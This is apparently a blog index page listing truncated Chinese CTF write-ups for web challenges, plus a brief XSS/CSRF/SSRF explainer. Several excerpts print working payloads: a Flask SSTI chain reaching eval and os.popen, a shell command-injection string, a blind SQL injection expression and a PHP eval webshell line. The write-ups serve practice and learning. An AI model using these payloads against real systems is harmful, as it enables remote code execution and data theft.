Sctf的斗地主真好玩
XCTF-SCTF(日常之爆零被吊打
说实话,从去年安洵杯开始我就没打过ctf了,被吊打也是常理之中
其实也不能算爆零,签到题是我交的flag
WEB-CloudDisk
这个题目,得益于马师傅手把手带才算做出来的。
【链接】Koa框架教程
这个题目提供了源码
const fs = require('fs');
const path = require('path');
const crypto = require('crypto');
const Koa = require('koa');
const Router = require('koa-router');
const koaBody = require('koa-body');
const send = req...
Buu摸鱼日记(5)
buu摸鱼日记(5)
[BJDCTF 2nd]fake google
这题大威天龙,大胆妖孽,我一眼就看出他是SSTI
7*7}}7*'7'}}
可以判断他是flask框架
随手测试一下,发现甚至没有过滤
推断一下,是python3
拿burp爆破一下subclasses ,就可以得到要用的类
qaq?name=().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__.__builtins__['eval']("__import__('os').popen('find / -name \"flag*\"').read()")}}
于是读取目录,find命令查找flag 发现根目录里就有f...
Buu摸鱼日记(4)
buu摸鱼日记(4)
[ACTF2020 新生赛]Exec
这比我预料的还简单
payload 127.0.0.1 & find / -name “flag*”
就会发现更目录里就有个flag
cat flag秒了
[ZJCTF 2019]NiZhuanSiWei
一开始看到这个题
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br>&...
Buu摸鱼日记(3)
buu摸鱼日记(3)
[网鼎杯 2018]Fakebook
说实话,看完了这个题目,我停止了思考
知识点过多,感觉需要花几天理一下
注册了一个账号,登进去,没思路了,也没看见什么公告板什么的(XSS)
不过,看了下wp,倒是把思路整理了出来了
(这是sql注入我真没想到)
首先先素质二连,拿起御剑/dirsearch …工具先扫一遍
然后会发现robot.txt和几个php什么的(有的能直接扫到flag.php(我没扫出来))
以及一个非常关键的东西:user.php.bak
可以发现他是经过了序列化的
<?php
class UserInfo
{
public $name = "";
public $age = 0;
publi...
Xss
XSS/csrf/ssrf
XSS的理论很简单,用一句话概括就是:利用非法的输入javascript等脚本,插入网站被保存,之后被受害者点开自动执行,弹出cookie或者执行一些骚操作
感觉这个漏洞的利用比较需要JS基础
这感觉也是一个和sql一样快绝种的洞了
XSS是服务器对用户输入的数据没有进行足够的过滤,导致客户端浏览器在渲染服务器返回的html页面时,出现了预期值之外的脚本语句被执行。
CSRF是服务器端没有对用户提交的数据进行随机值校验,且对http请求包内的refer字段校验不严,导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器。
SSRF是服务器对用户提供的可控URL过于信任,没有对攻击者提供的URL进行地址限制和足够的检测,导致...
Buu刷题(摸鱼)日记2
buu刷题(摸鱼)日记2
[ACTF2020 新生赛]Include
居然忘了php://filter伪协议,真是屑啊。
很简单,直接读flag
[CISCN2019 华北赛区 Day2 Web1]Hack World
sql注入自古弱项,研究一下
先上burp炸,用sql insert list 炸。
发现过滤单引号 双引号 注释符号 空格等,并且返回中有布尔值
应该是个盲注
(接下来我就做不来了(毕竟我真的菜))
分析一下wp里的payload:
(ascii(substr((select(flag)from(flag)),1,1))<128)
selec flag from flag不多说,从表里找字段
找出来的字段显然没有回显,需要进行判断...
战术刷buu(摸鱼日记)
战术刷buu(摸鱼日记)
很久没做题(以前也不强),在buu上刷点题快乐一下
[SUCTF 2019]CheckIn
打开题,一个上传界面。随便发了个图上去,能传(穿的是这个23333)
穿了个php马,不行,显示错误,于是改造了个图片马,传上去,显示<?不可出现
估计这个思路就是传图片马了,那怎么做到呢
用绕过
<script language="php">@eval($_POST('shell'));</script>
然而发现版本过高没有解析问题(白 折 腾 了)
于是憨得很的我去看wp
wp:https://xz.aliyun.com/t/6091
这题也满老了(指去年的题),这个.user.ini的骚操作看傻我了。
...
重新入坑web
重新入坑web
摸了很久,还是觉得ctf好玩,(战术回归),打一下攻防世界热热身
(门德尔松的音乐还挺好听)
view_source
F12秒杀不解释
get post
传参不解释(看下图解http就造了)
robots
一开始是懵逼的,看了wp才发现是根目录下文件夹(我真是废物啊),根目录留有robots.txt作为爬虫协议文件,指出有flagishere
backup
你知道index.php的备份文件吗?
.bak嘛,秒杀
cookie
打开burp,看了眼cookie,告诉我们有一个cookie.php,访问之,叫我们See the http response,repeat 之,header里有flag
disabled_button
前端...
40 post articles, 5 pages.